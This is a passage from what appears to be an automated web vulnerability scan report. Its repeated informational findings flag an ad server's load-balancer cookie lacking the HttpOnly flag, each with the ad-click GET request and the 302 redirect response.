  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

14.475. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2000460958/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2000460958/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2000460958/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:21:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

14.476. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039360394/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039360394/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039360394/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 402
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run
...[SNIP]...

14.477. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2101192040/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2101192040/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2101192040/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:30:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.478. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102258488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102258488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102258488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.479. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2105583430/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2105583430/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2105583430/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.480. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2110013632/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2110013632/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2110013632/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.481. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:01:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

14.482. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/222638617/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/222638617/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/222638617/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.483. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/230260175/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/230260175/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/230260175/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.484. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/249777070/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/249777070/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/249777070/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

14.485. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281847158/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281847158/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281847158/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

14.486. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/285317148/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/285317148/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/285317148/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.487. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/287333455/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/287333455/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/287333455/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.flashedition.com/publication?i=59172
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.flashedition.com/publication?i=59172
...[SNIP]...

14.488. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/301024327/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/301024327/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/301024327/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:23 GMT
Server: Apache/2.0.52 (Red Hat)
